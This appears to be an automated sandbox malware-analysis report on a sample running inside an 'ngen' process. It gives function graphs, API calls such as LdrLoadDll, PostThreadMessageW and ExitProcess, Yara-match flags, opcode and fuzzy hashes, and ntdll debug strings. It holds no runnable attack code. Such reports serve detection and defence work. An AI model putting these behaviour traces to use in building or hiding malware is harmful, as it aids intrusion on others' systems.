78417 414323 78417->78411 78418 4142ef 78418->78417 78428 41b1a3 RtlFreeHeap LdrInitializeThunk 78418->78428 78420 414303 78420->78417 78429 41b1a3 RtlFreeHeap LdrInitializeThunk 78420->78429 78422 414319 78422->78411 78423->78417 78423->78418 78425 413c13 78423->78425 78430 42b813 78425->78430 78428->78420 78429->78422 78431 42b82d 78430->78431 78434 58c2c70 LdrInitializeThunk 78431->78434 78432 413c35 78432->78418 78434->78432 78461 418c38 78462 42b593 NtClose 78461->78462 78463 418c42 78462->78463 78435 58c2b60 LdrInitializeThunk

                                                Executed Functions

                                                Function 00417A33 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 224 417a33-417a5c call 42e163 227 417a62-417a70 call 42e683 224->227 228 417a5e-417a61 224->228 231 417a80-417a91 call 42cb23 227->231 232 417a72-417a7d call 42e923 227->232 238 417a93-417aa7 LdrLoadDll 231->238 239 417aaa-417aad 231->239 232->231 238->239
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                • Instruction ID: a14b4ffdb5fe0ebae34abb196159bdaefeaa327230b00d9eb3ec642f8eb76095
                                                • Opcode Fuzzy Hash: 57b256dc90908556de02122e3e008531c90e9e31a9dfdb2c76c4b937d2b6b965
                                                • Instruction Fuzzy Hash: 940112B5E4010DBBDF10DAA5DC42FDEB7789F54304F004196E90897241F635EB548755
                                                Function 0042B593 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 245 42b593-42b5cf call 4049a3 call 42c643 NtClose
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                • Instruction ID: 1573654a4f4f23356e70bd42089c4cb39e63ab89980323d43f3de8af3be88636
                                                • Opcode Fuzzy Hash: 74d62e7fed49fee6b13ec8ce7c6b43655ce95c97f7f228006ed85af9b9889e1d
                                                • Instruction Fuzzy Hash: 6BE04676204254BBC220AA6AEC41F9F776DDFC5724F00442AFA08A7282C6B5BA1186E5
                                                Function 058C35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cb4b9bbe71f0b8a24b18c3cd3b8d8d825946d15d6df3d4bd8fa0cbc0984bd3ba
                                                • Instruction ID: 662e5180e74ef6da28ae27ee08d1d957d2fb5cd61008ec2f4ba2ef037962122a
                                                • Opcode Fuzzy Hash: cb4b9bbe71f0b8a24b18c3cd3b8d8d825946d15d6df3d4bd8fa0cbc0984bd3ba
                                                • Instruction Fuzzy Hash: B490023670551406D10071584554706516587D0201FA5C411A5428568D87998E5569B3
                                                Function 058C2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: f30365e1e9bc35a4e24ae96e359d7b203a8886acfd69e06a16fb025f22b4b847
                                                • Instruction ID: db67e4128848989b241cdd49e8626ff94f0a8f68c45f640e459e4881cf6d8c6d
                                                • Opcode Fuzzy Hash: f30365e1e9bc35a4e24ae96e359d7b203a8886acfd69e06a16fb025f22b4b847
                                                • Instruction Fuzzy Hash: 1090023630141417D11171584544707416987D0241FD5C412A5428558D965A8E56A532
                                                Function 058C2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 72a99df36c718de746cf337525b294f2a222b5717937111247e765065ab064ad
                                                • Instruction ID: 867e83a4f03ce1b7ba96ec95729a0441a3c7bc64c796b462ba01e72b6fb55bc4
                                                • Opcode Fuzzy Hash: 72a99df36c718de746cf337525b294f2a222b5717937111247e765065ab064ad
                                                • Instruction Fuzzy Hash: 0490023630149806D1107158844474A416587D0301F99C411A9428658D86998D957532
                                                Function 058C2B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: d63f95620425f02c5e6df26f568058e082e53ba61a51900bcc1071fb964e0f1c
                                                • Instruction ID: 73446c4c489d1277433f20241f6609e687b9107f13c1daa7ce8fd375b9d7429c
                                                • Opcode Fuzzy Hash: d63f95620425f02c5e6df26f568058e082e53ba61a51900bcc1071fb964e0f1c
                                                • Instruction Fuzzy Hash: B090026630241007410571584454616816A87E0201B95C021E6018590DC5298D956536
                                                Function 0041401A Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 9c137fe075127a70db5381a908e253cb779df88f74039d614837a5d3f9b81308
                                                • Instruction ID: e9a8c8687aaeafff36046211043bea6d8f886e60d9afbd7522c3a782f38ba3bd
                                                • Opcode Fuzzy Hash: 9c137fe075127a70db5381a908e253cb779df88f74039d614837a5d3f9b81308
                                                • Instruction Fuzzy Hash: A1118973904158BBDB029B749C46DEFFF7CEF81350B0480AEFA5467142D6394E4287A5
                                                Function 00414059 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 34911ca6fa78662a9a750860d5d86970cb422ce9c6129bf029718bd3649f74d8
                                                • Instruction ID: d6e4ff19b95466e9fe5a75fee5ad12c3f5ada0eb833e20bbb35db8e367bde451
                                                • Opcode Fuzzy Hash: 34911ca6fa78662a9a750860d5d86970cb422ce9c6129bf029718bd3649f74d8
                                                • Instruction Fuzzy Hash: 6E0166B2D0010C7ADB109FE19C82EEFAB7CDF84798F40802AFA04B7241D2784F4687A5
                                                Function 0041408B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: c91aaa8decee38f3a30e2a95e9d8b0a291183a2d72e685fc848b434c8b6d8a09
                                                • Instruction ID: cf9192664244b9ac975f5907ec0277faeb991ed911cf0314b90d64a2ad3432a1
                                                • Opcode Fuzzy Hash: c91aaa8decee38f3a30e2a95e9d8b0a291183a2d72e685fc848b434c8b6d8a09
                                                • Instruction Fuzzy Hash: 9011E5B2D0411C7EEB119FA19C82DEFBB7CDF417A8F008069FA04A7141D6794F0687A5
                                                Function 00414093 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                APIs
                                                • PostThreadMessageW.USER32(H0840I45,00000111,00000000,00000000), ref: 00414107
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: MessagePostThread
                                                • String ID: H0840I45$H0840I45
                                                • API String ID: 1836367815-3713557624
                                                • Opcode ID: 5772162eecc2fe24cd4613575fecf9fb22c6b493dc5cb581e736842785e4031c
                                                • Instruction ID: 3a752632b7030014dc9c9c30b5bcc15c88147ef53de421226a9d1532deb992d1
                                                • Opcode Fuzzy Hash: 5772162eecc2fe24cd4613575fecf9fb22c6b493dc5cb581e736842785e4031c
                                                • Instruction Fuzzy Hash: D901C4B2D0021C7AEB11AFE19C82DEFBB7CDF41798F408069FA14A7241D6794F0647A5
                                                Function 0042B903 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 71 42b903-42b947 call 4049a3 call 42c643 RtlFreeHeap
                                                APIs
                                                • RtlFreeHeap.NTDLL(00000000,00000004,00000000,?,00000007,00000000,00000004,00000000,?,000000F4,?,?,?,?,?), ref: 0042B942
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: FreeHeap
                                                • String ID: gA
                                                • API String ID: 3298025750-3478526202
                                                • Opcode ID: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                                                • Instruction ID: fe3716f387f97a3cfac574e56e7d4e73213d1ab919c33c628ae6fa0e6f0a2ede
                                                • Opcode Fuzzy Hash: e7214976f619b748219cd2fa71ca53e767825fd315e4bba5c138d2cf3527078b
                                                • Instruction Fuzzy Hash: A9E06DB12043047BC620EE59EC45F9B73ACEFC5714F000029FA08A7241C671BA108AF9
                                                Function 00417AB3 Relevance: 1.6, APIs: 1, Instructions: 104libraryloaderCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 203 417ab3-417abf 204 417ac1-417acf 203->204 205 417a8f-417a91 203->205 208 417ad1-417ad5 204->208 209 417a64-417a65 204->209 206 417a93-417aa7 LdrLoadDll 205->206 207 417aaa-417aad 205->207 206->207 210 417ad7-417b09 208->210 211 417b2a 208->211 212 417a6b-417a70 209->212 213 417a66 call 42e683 209->213 216 417b67-417b91 211->216 217 417b2c-417b2d 211->217 214 417a80-417a8c call 42cb23 212->214 215 417a72-417a7d call 42e923 212->215 213->212 214->205 215->214
                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417AA5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 06c304be024d8702e79fa6f4f19215bbb79918f4870c72a52a1b29490fcb6eb2
                                                • Instruction ID: 6c43b7506f89a022c64d044e6c1ccbca58ffe011e8d6516ae037575ea145fc98
                                                • Opcode Fuzzy Hash: 06c304be024d8702e79fa6f4f19215bbb79918f4870c72a52a1b29490fcb6eb2
                                                • Instruction Fuzzy Hash: 8C219D73A4810A6BDB01D998DC82ADEBB68EF41748F14415AE805DB343EB35EA06C7E5
                                                Function 0042B8B3 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 240 42b8b3-42b8f7 call 4049a3 call 42c643 RtlAllocateHeap
                                                APIs
                                                • RtlAllocateHeap.NTDLL(?,0041E238,?,?,00000000,?,0041E238,?,?,?), ref: 0042B8F2
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateHeap
                                                • String ID:
                                                • API String ID: 1279760036-0
                                                • Opcode ID: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                                                • Instruction ID: d9b541be78cc90539b36e3aa14f4a365451e7fb9285a10e02975410261364557
                                                • Opcode Fuzzy Hash: e87ef4bac42e6c86340b279ddb217ac5fed7b9462247c58aa44df4a450922197
                                                • Instruction Fuzzy Hash: DAE06DB62042047FD620EF59EC45E9B73ACEFC9714F004419F908A7241D671B9108AB9
                                                Function 0042B953 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                Download Yara Rule

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 250 42b953-42b98f call 4049a3 call 42c643 ExitProcess
                                                APIs
                                                • ExitProcess.KERNEL32(?,00000000,?,?,0FADE886,?,?,0FADE886), ref: 0042B98A
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293698389.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_400000_ngen.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: ExitProcess
                                                • String ID:
                                                • API String ID: 621844428-0
                                                • Opcode ID: 06b400fc049ae8453f422dbdba32e523414dcf3d7d78a6a6816b0409ae45605f
                                                • Instruction ID: c24f298f8ce9a33bcb8732fbd3dc6627db416b18a23357072eb898eabaee20fe
                                                • Opcode Fuzzy Hash: 06b400fc049ae8453f422dbdba32e523414dcf3d7d78a6a6816b0409ae45605f
                                                • Instruction Fuzzy Hash: 5BE04F756012147BD620AB5AEC41F9B775CDBC5714F40406AFA08A7145C6747A1187F5
                                                Function 058C2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 35cd4e2740dc5fa1e9b7b1cb2cb5186cded2ebc32dc949148df334e76b4616da
                                                • Instruction ID: 48e7bb2212e0fce83b3dc7d7a253c086e42e857c9a45ce1a6d685fb021b1d4af
                                                • Opcode Fuzzy Hash: 35cd4e2740dc5fa1e9b7b1cb2cb5186cded2ebc32dc949148df334e76b4616da
                                                • Instruction Fuzzy Hash: E4B02B329014C0C9DA00F3204608B177E1077C0300F15C061D3034241E033CC4C0E172

                                                Non-executed Functions

                                                Function 058B8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                Download Yara Rule
                                                Strings
                                                • Critical section address., xrefs: 058F5502
                                                • undeleted critical section in freed memory, xrefs: 058F542B
                                                • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F54CE
                                                • Thread identifier, xrefs: 058F553A
                                                • Thread is in a state in which it cannot own a critical section, xrefs: 058F5543
                                                • Invalid debug info address of this critical section, xrefs: 058F54B6
                                                • corrupted critical section, xrefs: 058F54C2
                                                • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F540A, 058F5496, 058F5519
                                                • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 058F54E2
                                                • 8, xrefs: 058F52E3
                                                • double initialized or corrupted critical section, xrefs: 058F5508
                                                • Critical section address, xrefs: 058F5425, 058F54BC, 058F5534
                                                • Address of the debug info found in the active list., xrefs: 058F54AE, 058F54FA
                                                • Critical section debug info address, xrefs: 058F541F, 058F552E
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                • API String ID: 0-2368682639
                                                • Opcode ID: 83778820685a3f389a110ab20fbef56d291045a9d736291f93255c6c4dec7d15
                                                • Instruction ID: b4b213a678036ca958917c1c1c0fe55844650c3300ed039f4dfed1d768a36faa
                                                • Opcode Fuzzy Hash: 83778820685a3f389a110ab20fbef56d291045a9d736291f93255c6c4dec7d15
                                                • Instruction Fuzzy Hash: BA816AB1A40348AFDB20CF99C945BAEBBF9BB48714F10411AEA09F7240D3B5AD40DF60
                                                Function 05919179 Relevance: 10.4, Strings: 8, Instructions: 401COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: %s\%ld\%s$%s\%u-%u-%u-%u$AppContainerNamedObjects$BaseNamedObjects$Global\Session\%ld%s$\AppContainerNamedObjects$\BaseNamedObjects$\Sessions
                                                • API String ID: 0-3063724069
                                                • Opcode ID: 9d884acd40f7fa103b846e3194645b7712717091e418bdea7e63dace952ecf0f
                                                • Instruction ID: 830c8f9ec133a092b3e5e93c57731baecc3d87c36fa0305997e40d6f3b0f6333
                                                • Opcode Fuzzy Hash: 9d884acd40f7fa103b846e3194645b7712717091e418bdea7e63dace952ecf0f
                                                • Instruction Fuzzy Hash: 21D1F172908329AFD722DB54C854B6BB7ECAF84B54F044929FE84E7250D770DD0487E6
                                                Function 0587D08D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                Download Yara Rule
                                                Strings
                                                • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0587D262
                                                • @, xrefs: 0587D2AF
                                                • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0587D2C3
                                                • @, xrefs: 0587D0FD
                                                • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0587D146
                                                • Control Panel\Desktop\LanguageConfiguration, xrefs: 0587D196
                                                • @, xrefs: 0587D313
                                                • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0587D0CF
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                • API String ID: 0-1356375266
                                                • Opcode ID: b9b154ca2dc177de992f70a710fdc74873d7d0cfd975fa745c174af45e9fd5fe
                                                • Instruction ID: 2011eb31347d4fd794275e94e89b74e1426b76fc15ee4d8bc142e237f6fd640b
                                                • Opcode Fuzzy Hash: b9b154ca2dc177de992f70a710fdc74873d7d0cfd975fa745c174af45e9fd5fe
                                                • Instruction Fuzzy Hash: EAA15771A093099FD721DE24C484B6BFBE9BF84715F00492EE999D6240E774DD08CBA3
                                                Function 0587F172 Relevance: 8.2, Strings: 6, Instructions: 684COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                • API String ID: 0-523794902
                                                • Opcode ID: d8e8f98ae6a1732d3a320358a4503623cfa8cb98677c2f47866106f58e985e4a
                                                • Instruction ID: 7d19520fb8222df1a3d7591ae00ab12c3af1616ea6b28a6a27f8ed6d17dfbe22
                                                • Opcode Fuzzy Hash: d8e8f98ae6a1732d3a320358a4503623cfa8cb98677c2f47866106f58e985e4a
                                                • Instruction Fuzzy Hash: D542CF312187899FC715DF29C888A2ABBE6FF84604F18496DED96CB351D734DC41CB62
                                                Function 0589B1B0 Relevance: 7.8, Strings: 6, Instructions: 350COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: API set$DLL %wZ was redirected to %wZ by %s$LdrpPreprocessDllName$LdrpPreprocessDllName for DLL %wZ failed with status 0x%08lx$SxS$minkernel\ntdll\ldrutil.c
                                                • API String ID: 0-122214566
                                                • Opcode ID: 811d26b74fb492754a126abf90095b750c1d143e95d3c7b1f4b285e9d6df45c5
                                                • Instruction ID: 70c59957ff8419a1fd0bd39661da8e5db640cbdeb7f5f25f96bea870f685dfcb
                                                • Opcode Fuzzy Hash: 811d26b74fb492754a126abf90095b750c1d143e95d3c7b1f4b285e9d6df45c5
                                                • Instruction Fuzzy Hash: 48C13631B08219ABDF29CB68D885BBEB7A6FF45715F084069EC02EB290DB74CC44D791
                                                Function 0592F525 Relevance: 7.7, Strings: 6, Instructions: 231COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                • API String ID: 0-1745908468
                                                • Opcode ID: b5f7c77bdf0b6d6f445d2ad53c1b610f78d22cd954c310ef8e92114397b75419
                                                • Instruction ID: dae8f54b35f97a3c5227d698e00cfb150339309c8c827addc28e82027c46698e
                                                • Opcode Fuzzy Hash: b5f7c77bdf0b6d6f445d2ad53c1b610f78d22cd954c310ef8e92114397b75419
                                                • Instruction Fuzzy Hash: 6D912E31A04758DFCB11DFA8C446AADBBF6FF49710F18805AE846AB761DB399C81CB11
                                                Function 0587645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON
                                                Download Yara Rule
                                                Strings
                                                • Getting the shim engine exports failed with status 0x%08lx, xrefs: 058D9A01
                                                • minkernel\ntdll\ldrinit.c, xrefs: 058D9A11, 058D9A3A
                                                • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 058D99ED
                                                • LdrpInitShimEngine, xrefs: 058D99F4, 058D9A07, 058D9A30
                                                • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 058D9A2A
                                                • apphelp.dll, xrefs: 05876496
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                • API String ID: 0-204845295
                                                • Opcode ID: 8c0d170bc62cc28408be8e22af9a5ea55c6feaea3e1e2cef469df84be597c0ed
                                                • Instruction ID: e513551e74c31530c681fdf5f914ba96c06003ae03e2a517475f1baf4d16a725
                                                • Opcode Fuzzy Hash: 8c0d170bc62cc28408be8e22af9a5ea55c6feaea3e1e2cef469df84be597c0ed
                                                • Instruction Fuzzy Hash: 035190713187089FD725DB24D845A6BB7E9FB84644F04091AFD86DB260EA34ED04DBA3
                                                Function 058BC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • minkernel\ntdll\ldrredirect.c, xrefs: 058F8181, 058F81F5
                                                • Loading import redirection DLL: '%wZ', xrefs: 058F8170
                                                • LdrpInitializeProcess, xrefs: 058BC6C4
                                                • LdrpInitializeImportRedirection, xrefs: 058F8177, 058F81EB
                                                • minkernel\ntdll\ldrinit.c, xrefs: 058BC6C3
                                                • Unable to build import redirection Table, Status = 0x%x, xrefs: 058F81E5
                                                Memory Dump Source
                                                • Source File: 00000004.00000002.2293944288.0000000005850000.00000040.00001000.00020000.00000000.sdmp, Offset: 05850000, based on PE: true
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_4_2_5850000_ngen.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                • API String ID: 0-475462383
                                                • Opcode ID: 7b904b074391be7a36ff9f0c448b7b5ab167feab803d1e1ccd873f7611b0f9db
                                                • Instruction ID: fb2aaa9173cfd66b34efb5511528517ce9f437fc1a2b4cb0570ebae3e6817004
                                                • Opcode Fuzzy Hash: 7b904b074391be7a36ff9f0c448b7b5ab167feab803d1e1ccd873f7611b0f9db
                                                • Instruction Fuzzy Hash: 3A31D1727487059BD320EA28DC4AE6A77D9EF85B10F040958FD45EB390EA70EC04CBA3
                                                Function 058B2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                Download Yara Rule
                                                Strings
                                                • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 058F2180
                                                • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 058F2178
                                                • SXS: %s() passed the empty activation context, xrefs: 058F2165
